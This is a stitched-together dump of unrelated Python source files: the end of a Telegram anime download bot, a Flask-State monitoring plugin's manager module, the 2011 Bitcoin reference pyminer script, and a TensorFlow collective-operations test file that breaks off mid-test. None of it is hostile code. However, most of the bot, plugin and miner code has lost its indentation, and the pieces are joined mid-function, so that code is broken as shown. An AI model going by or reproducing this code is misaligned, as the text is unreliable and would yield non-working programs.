chat_id=chat_id, text=anime_title, reply_markup=InlineKeyboardMarkup(markup))
if query_data.split("=")[0] == "i":
db.info.insert_one({"chat_id": chat_id, "anime": query_data.split("=")[
1], "date": datetime.datetime.now()})
anime_info = fetch_animepahe_info(query_data.split("=")[1])
markup = [[InlineKeyboardButton(
"Get Recommendations 🚀", callback_data="r=" + query_data.split("=")[1])]]
context.bot.send_photo(chat_id=chat_id, photo=anime_info["poster"])
context.bot.send_message(chat_id=chat_id, text=config["messages"]["anime_info"].format(
*list(anime_info.values())[1:-1] + [", ".join(anime_info["genre"])]), reply_markup=InlineKeyboardMarkup(markup))
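# Summary of the callback_data prefixes produced by the inline keyboards above
# and dispatched in button_thread (formats taken from the handlers; nothing
# here is new protocol):
#   "r=<session>"                  -> fetch recommendations from animepahe
#   "d=<href>"                     -> list a gogoanime title's episode ranges
#   "f=<alias>=<anime_id>=<start>" -> list ten episodes starting at <start>
#   "g=<href>"                     -> fetch download links for one episode
#   "i=<session>"                  -> fetch anime info from animepahe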
def start(update, context):
chat_id = update.effective_chat.id
first_name = update["message"]["chat"]["first_name"]
if not db.users.find_one({"chat_id": chat_id}):
db.users.insert_one(
{"chat_id": chat_id, "last_command": None, "admin": False, "date": datetime.datetime.now()})
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["start"].format(first_name))
markup = ReplyKeyboardMarkup([[KeyboardButton("/download"), KeyboardButton("/recommend"), KeyboardButton("/latest")], [
KeyboardButton("/info"), KeyboardButton("/donate"), KeyboardButton("/help")]], resize_keyboard=True)
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["menu"], reply_markup=markup)
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def donate(update, context):
chat_id = update.effective_chat.id
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["donate"])
context.bot.send_message(chat_id=chat_id, text=config["messages"]["menu"])
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def latest(update, context):
chat_id = update.effective_chat.id
thread = threading.Thread(target=latest_anime, args=[context, chat_id])
thread.start()
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def help(update, context):
chat_id = update.effective_chat.id
total_users = db.users.count_documents({})
total_downloaded = db.downloaded_anime.count_documents({})
total_recommendations = db.recommendations.count_documents({})
total_info = db.info.count_documents({})
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["help"].format(total_users, total_downloaded, total_recommendations, total_info))
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def recommend(update, context):
chat_id = update.effective_chat.id
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["recommend"])
db.users.update_one({"chat_id": chat_id}, {
"$set": {"last_command": "recommend"}})
def download(update, context):
chat_id = update.effective_chat.id
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["download"])
db.users.update_one({"chat_id": chat_id}, {
"$set": {"last_command": "download"}})
def get_info(update, context):
chat_id = update.effective_chat.id
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["get_info"])
db.users.update_one({"chat_id": chat_id}, {
"$set": {"last_command": "get_info"}})
def broadcast(update, context):
chat_id = update.effective_chat.id
if db.users.find_one({"chat_id": chat_id}).get("admin"):
num_users = db.users.count_documents({})
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["broadcast"].format(num_users))
db.users.update_one({"chat_id": chat_id}, {
"$set": {"last_command": "broadcast"}})
def echo(update, context):
thread = threading.Thread(target=echo_thread, args=[update, context])
thread.start()
def button(update, context):
thread = threading.Thread(target=button_thread, args=[update, context])
thread.start()
start_handler = CommandHandler("start", start)
dispatcher.add_handler(start_handler)
donate_handler = CommandHandler("donate", donate)
dispatcher.add_handler(donate_handler)
help_handler = CommandHandler("help", help)
dispatcher.add_handler(help_handler)
latest_handler = CommandHandler("latest", latest)
dispatcher.add_handler(latest_handler)
recommend_handler = CommandHandler("recommend", recommend)
dispatcher.add_handler(recommend_handler)
download_handler = CommandHandler("download", download)
dispatcher.add_handler(download_handler)
get_info_handler = CommandHandler("info", get_info)
dispatcher.add_handler(get_info_handler)
broadcast_handler = CommandHandler("broadcast", broadcast)
dispatcher.add_handler(broadcast_handler)
echo_handler = MessageHandler(Filters.text & (~Filters.command), echo)
dispatcher.add_handler(echo_handler)
button_handler = CallbackQueryHandler(button)
dispatcher.add_handler(button_handler)
updater.start_polling()
|
manager.py
|
import os
import sched
import threading
import time
from flask import request, current_app
from .response_methods import make_response_content
from ..conf.config import HttpMethod, Constant
from ..exceptions import ErrorResponse
from ..exceptions.error_code import MsgCode
from ..exceptions.log_msg import ErrorMsg, InfoMsg
from ..models import model_init_app
from ..services import redis_conn
from ..services.host_status import query_flask_state_host, record_flask_state_host
from ..utils.auth import auth_user, auth_method
from ..utils.file_lock import Lock
from ..utils.format_conf import format_address, format_sec
from ..utils.logger import logger, DefaultLogger
ONE_MINUTE_SECONDS = 60
def init_app(app, interval=Constant.DEFAULT_SECONDS, log_instance=None):
"""
Plugin entry
:param app: Flask app
:param interval: record interval
:param log_instance: custom logger object
"""
logger.set(log_instance or DefaultLogger().get())
app.add_url_rule('/v0/state/hoststatus', endpoint='state_host_status', view_func=query_flask_state,
methods=[HttpMethod.POST.value])
init_db(app)
init_redis(app)
model_init_app(app)
# Timing recorder
interval = format_sec(interval)
t = threading.Thread(target=record_timer, args=(app, interval,))
    t.daemon = True
t.start()
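# Rough usage sketch for init_app (comments only; the SQLite bind key name and
# the import path are assumptions based on this module, not verified against
# the package documentation):
#
#   from flask import Flask
#   import flask_state
#
#   app = Flask(__name__)
#   app.config['SQLALCHEMY_BINDS'] = {'flask_state_sqlite': 'flask_state.db'}
#   app.config['REDIS_CONF'] = {'REDIS_STATUS': True, 'REDIS_HOST': '127.0.0.1',
#                               'REDIS_PORT': 6379, 'REDIS_PASSWORD': ''}
#   flask_state.init_app(app, interval=60)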
def init_redis(app):
redis_state = app.config.get('REDIS_CONF', {})
if not redis_state.get('REDIS_STATUS'):
return
redis_conf_keys = ['REDIS_HOST', 'REDIS_PORT', 'REDIS_PASSWORD']
redis_conf = {key: value for key, value in redis_state.items() if key in redis_conf_keys}
redis_conn.set_redis(redis_conf)
def init_db(app):
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
if not app.config.get('SQLALCHEMY_BINDS', {}).get(Constant.DEFAULT_BIND_SQLITE):
raise KeyError(ErrorMsg.LACK_SQLITE.get_msg())
app.config['SQLALCHEMY_BINDS'][Constant.DEFAULT_BIND_SQLITE] = format_address(
app.config['SQLALCHEMY_BINDS'].get(Constant.DEFAULT_BIND_SQLITE))
def record_timer(app, interval):
app.lock_flask_state = Lock.get_file_lock()
with app.app_context():
try:
current_app.lock_flask_state.acquire()
logger.info(InfoMsg.ACQUIRED_LOCK.get_msg('. process ID: %d' % os.getpid()))
s = sched.scheduler(time.time, time.sleep)
in_time = time.time()
target_time = int(int((time.time()) / ONE_MINUTE_SECONDS + 1) * ONE_MINUTE_SECONDS)
time.sleep(ONE_MINUTE_SECONDS - in_time % ONE_MINUTE_SECONDS)
record_flask_state_host(interval)
while True:
target_time += interval
now_time = time.time()
s.enter(target_time - now_time, 1, record_flask_state_host, (interval,))
s.run()
except BlockingIOError:
pass
except Exception as e:
current_app.lock_flask_state.release()
raise e
@auth_user
@auth_method
def query_flask_state():
"""
Query the local state and redis status
:return: flask response
"""
try:
b2d = request.json
if not isinstance(b2d, dict):
            logger.warning(ErrorMsg.DATA_TYPE_ERROR.get_msg(
                '. The target type is %s, not %s' % (dict.__name__, type(b2d).__name__)))
return make_response_content(ErrorResponse(MsgCode.JSON_FORMAT_ERROR))
time_quantum = b2d.get('timeQuantum')
return make_response_content(resp=query_flask_state_host(time_quantum))
except Exception as e:
logger.exception(e)
return make_response_content(ErrorResponse(MsgCode.UNKNOWN_ERROR), http_status=500)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
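        # Note on the scheme above (describing the code as written): the
        # getwork 'data' hex arrives byte-reversed, so bufreverse() and
        # wordreverse() undo that ordering; the 80-byte header is hashed twice
        # with SHA-256, a cheap pre-filter keeps only candidates whose last
        # four digest bytes are zero (the high 32 bits of the big-endian
        # hash), and only those survivors are compared against the full
        # 256-bit target.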
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8772
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
collective_ops_test.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import kernels
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
class CollectiveOpTest(test.TestCase):
def setUp(self):
context._reset_context() # pylint: disable=protected-access
super(CollectiveOpTest, self).setUp()
def _testCollectiveReduce(self,
inputs,
expected,
set_graph_key,
communication_hint='auto',
fp16=False,
instance_key=1,
merge_op='Add',
final_op='Div',
timeout=0,
reported_group_size=None):
group_key = 1
group_size = len(inputs)
if reported_group_size is None:
reported_group_size = group_size
device_type = 'CPU'
config = config_pb2.ConfigProto(device_count={device_type: group_size})
devices = ['/{}:{}'.format(device_type, i) for i in range(group_size)]
with self.session(config=config) as sess:
colred = []
for i in range(group_size):
with ops.device(devices[i]):
tensor = constant_op.constant(inputs[i], dtype=(
dtypes.float16 if fp16 else dtypes.float32))
colred.append(
collective_ops.all_reduce(
tensor,
reported_group_size,
group_key,
instance_key,
merge_op,
final_op,
communication_hint=communication_hint,
timeout=timeout))
run_options = config_pb2.RunOptions()
if set_graph_key:
run_options.experimental.collective_graph_key = 1
results = sess.run(colred, options=run_options)
tolerance = 1e-3 if fp16 else 1e-5
for i in range(group_size):
logging.info('i {} result {} expected {}'.format(i, results[i], expected))
self.assertAllClose(results[i], expected, rtol=tolerance, atol=tolerance)
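  # Worked example (illustrative, not part of the original test): with the
  # default merge_op='Add' and final_op='Div', each element of the all-reduce
  # output is the group mean. For group_size=2 and per-device inputs 0.1, 0.3:
  #     merged = 0.1 + 0.3 = 0.4          # merge_op combines across devices
  #     final  = 0.4 / group_size = 0.2   # final_op divides by the group size
  # which is why the reduce tests below expect 0.2, 1.2, 2.2, ... for those
  # inputs.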
def _testMultipleConcurrentCollectiveReduce(self, t0, t1, expected):
group_key = 1
group_size = 2
num_instances = 2
all_reduces = []
config = config_pb2.ConfigProto(device_count={'CPU': group_size})
config.experimental.collective_deterministic_sequential_execution = True
with self.session(config=config) as sess:
for cpu in range(group_size):
with ops.device('/CPU:%d' % cpu):
in_tensor = constant_op.constant(t0 if cpu == 0 else t1)
for instance in range(num_instances):
all_reduces.append(collective_ops.all_reduce(
in_tensor, group_size, group_key, instance, 'Add', 'Div'))
results = sess.run(all_reduces)
for i in range(group_size * num_instances):
self.assertAllClose(results[i], expected, rtol=1e-5, atol=1e-5)
def testCollectiveReduce(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]],
expected=[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2],
set_graph_key=True)
def testCollectiveAutoGraphKey(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]],
expected=[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2],
set_graph_key=False)
def testFp16Reduce(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]],
expected=[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2],
set_graph_key=True,
fp16=True)
def testCollectiveMultipleConcurrentReduce(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testMultipleConcurrentCollectiveReduce(
[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3],
[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2])
def testCollectiveTimeoutV1(self):
timeout = 4.5
kwargs = dict(
inputs=[[i + j + 0.1 for i in range(8)] for j in range(3)],
expected=[1 + i + 0.1 for i in range(8)],
set_graph_key=True,
timeout=timeout)
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(**kwargs)
start_time = time.time()
with ops.Graph().as_default():
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
self._testCollectiveReduce(
reported_group_size=len(kwargs['inputs']) + 1, **kwargs)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
@test_util.run_v2_only
def testCollectiveTimeoutV2(self):
timeout = 4.5
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
@def_function.function
def run_all_reduce(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1, 2, 3, 4]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/CPU:{}'.format(i)):
input_data = constant_op.constant(tensor)
collective_op = collective_ops.all_reduce(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
merge_op='Add',
final_op='Id',
timeout=timeout)
results.append(collective_op)
return results
run_all_reduce(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run_all_reduce(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
@test_util.run_v2_only
def testParamResolutionAfterTimeoutV2(self):
timeout = 1.5
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
group_key = 20
instance_key = 30
input_data = constant_op.constant([1, 2, 3, 4])
    # This timeout comes from param resolution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device('CPU:0'):
collective_ops.all_reduce(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
merge_op='Add',
final_op='Id',
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
    # short. Since CPU:0 times out in the param resolution phase, CPU:1 should
    # time out as well, but in the execution phase.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device('CPU:1'):
collective_ops.all_reduce(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
merge_op='Add',
final_op='Id',
timeout=timeout)
def testNcclHintFallbackToRingReduce(self):
"""Tests that setting `communication_hint=nccl` works on non-GPU builds."""
if kernels.get_registered_kernels_for_op('NcclAllReduce'):
self.skipTest('Run only on non-GPU environments')
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]],
expected=[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2],
set_graph_key=False,
communication_hint='nccl')
def _testWhile(self, num_vars, num_iterations, key_base):
group_size = 2
group_key = 1
instances = [(key_base + i) for i in range(num_vars)]
devices = ['CPU:{}'.format(i) for i in range(group_size)]
config = config_pb2.ConfigProto(device_count={'CPU': group_size})
rewrite_options = config.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append('CollectiveReduce')
with self.session(config=config) as sess:
loop_vars = []
for device in devices:
with ops.device(device):
loop_vars.append(
[variables.VariableV1((1 << i) * 1.) for i in range(num_vars)])
# This variable controls number of iterations.
loop_vars.append(variables.VariableV1(0.))
def loop_body(dev0_tensors, dev1_tensors, loop_tensor):
return_ops = []
for i in range(len(devices)):
device = devices[i]
device_tensors = dev0_tensors if i == 0 else dev1_tensors
with ops.device(device):
device_collectives = []
for j in range(num_vars):
# NOTE(ayushd): we need the `cast` here to ensure that the input
# to `all_reduce` has an explicit device string. We don't use
# `identity` because `cast` is more resilient to getting optimized
# away by various optimization passes.
input_tensor = math_ops.cast(device_tensors[j], dtypes.float16)
collective_op = collective_ops.all_reduce(
input_tensor, group_size, group_key, instances[j],
'Add', 'Id')
output_tensor = math_ops.cast(collective_op, dtypes.float32)
device_collectives.append(output_tensor)
return_ops.append(device_collectives)
return_ops.append(math_ops.add(loop_tensor, 1.))
return return_ops
# Run until last variable exceeds number of iterations.
loop_cond = lambda d0, d1, i: math_ops.less(i, num_iterations)
sess.run(variables.global_variables_initializer())
results = sess.run(control_flow_ops.while_loop(loop_cond, loop_body,
loop_vars))
self.assertEqual(results[:-1], [
[((1 << (num_iterations + v)) * 1.) for v in range(num_vars)]
for _ in range(group_size)])
def testSimpleWhile(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testWhile(num_vars=1, num_iterations=4, key_base=20)
def testWhileMultipleAllReduce(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testWhile(num_vars=2, num_iterations=4, key_base=20)
def testWhileWithScopedAllocator(self):
group_size = 2
group_key = 1
instance_key0 = 1
instance_key1 = 2
config = config_pb2.ConfigProto(device_count={'CPU': group_size})
rewrite_options = config.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append('CollectiveReduce')
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(config=config) as sess:
run_ops = []
for i in range(group_size):
with ops.device('CPU:%d' % i):
constant = constant_op.constant(0.)
cond = lambda i: math_ops.less(i, 10.)
body = lambda i: math_ops.add(i, 1.)
input0 = control_flow_ops.while_loop(cond, body, [constant])
input1 = math_ops.add(constant, 5)
colred0 = collective_ops.all_reduce(input0, group_size, group_key,
instance_key0, 'Add', 'Id')
colred1 = collective_ops.all_reduce(input1, group_size, group_key,
instance_key1, 'Add', 'Id')
run_ops.append(math_ops.add_n([colred0, colred1]))
results = sess.run(run_ops)
self.assertEqual(results, [30., 30.])
def testCollectiveReduceScalar(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(inputs=[0.1, 0.3], expected=0.2,
set_graph_key=True)
def testCollectiveReduceMaximum(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[1., 20., 3., 40., 5.], [10., 2., 30., 4., 50.]],
expected=[10., 20., 30., 40., 50.],
set_graph_key=True,
instance_key=30,
merge_op='Max',
final_op='Id')
def testCollectiveReduceMinimum(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[1., 20., 3., 40., 5.], [10., 2., 30., 4., 50.]],
expected=[1., 2., 3., 4., 5.],
set_graph_key=True,
instance_key=40,
merge_op='Min',
final_op='Id')
def _testCollectiveBroadcast(self, in_val):
group_key = 1
instance_key = 1
with self.session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})) as sess:
with ops.device('/CPU:0'):
in0 = constant_op.constant(in_val)
out0 = collective_ops.broadcast_send(in0, in0.shape, in0.dtype,
2, group_key, instance_key)
with ops.device('/CPU:1'):
c1 = constant_op.constant(in_val)
out1 = collective_ops.broadcast_recv(c1.shape, c1.dtype,
2, group_key, instance_key)
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 1
results = sess.run([out0, out1], options=run_options)
self.assertAllClose(results[0], in_val, rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], in_val, rtol=1e-5, atol=1e-5)
def testCollectiveBroadcast(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveBroadcast([0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1])
def testCollectiveBroadcastBool(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveBroadcast([True, False])
def _testCollectiveGather(self, t0, t1, expected, set_graph_key):
group_key = 1
instance_key = 1
with self.session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})) as sess:
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_gather(in0, 2, group_key, instance_key)
with ops.device('/CPU:1'):
in1 = constant_op.constant(t1)
c1 = collective_ops.all_gather(in1, 2, group_key, instance_key)
run_options = config_pb2.RunOptions()
if set_graph_key:
run_options.experimental.collective_graph_key = 1
results = sess.run([c0, c1], options=run_options)
self.assertAllClose(results[0], expected, rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], expected, rtol=1e-5, atol=1e-5)
def testCollectiveGather(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveGather([0, 1, 2, 3, 4, 5, 6, 7],
[10, 11, 12, 13, 14, 15, 16, 17],
[0, 1, 2, 3, 4, 5, 6, 7,
10, 11, 12, 13, 14, 15, 16, 17],
True)
self._testCollectiveGather([[0, 1, 2, 3], [4, 5, 6, 7]],
[[10, 11, 12, 13], [14, 15, 16, 17]],
[[0, 1, 2, 3], [4, 5, 6, 7],
[10, 11, 12, 13], [14, 15, 16, 17]],
True)
self._testCollectiveGather([[[0, 1], [2, 3]], [[4, 5], [6, 7]]],
[[[10, 11], [12, 13]], [[14, 15], [16, 17]]],
[[[0, 1], [2, 3]], [[4, 5], [6, 7]],
[[10, 11], [12, 13]], [[14, 15], [16, 17]]],
True)
def testCollectiveGatherShapeMismatch(self):
group_key = 1
instance_key = 1
t0 = [1, 2, 3, 4]
t1 = [5, 6, 7, 8]
t2 = [9, 10]
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})) as sess:
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_gather(in0, 2, group_key, instance_key)
with ops.device('/CPU:1'):
in1 = constant_op.constant(t1)
in2 = constant_op.constant(t2)
c1 = collective_ops.all_gather(in1, 2, group_key, instance_key)
c2 = collective_ops.all_gather(in2, 2, group_key, instance_key)
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 1
sess.run([c0, c1], options=run_options)
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Shape mismatch'):
sess.run([c0, c2], options=run_options)
def testCollectiveGatherShapeMismatchAcrossDevices(self):
group_key = 1
instance_key = 1
t0 = [1, 2, 3, 4]
t1 = [5, 6]
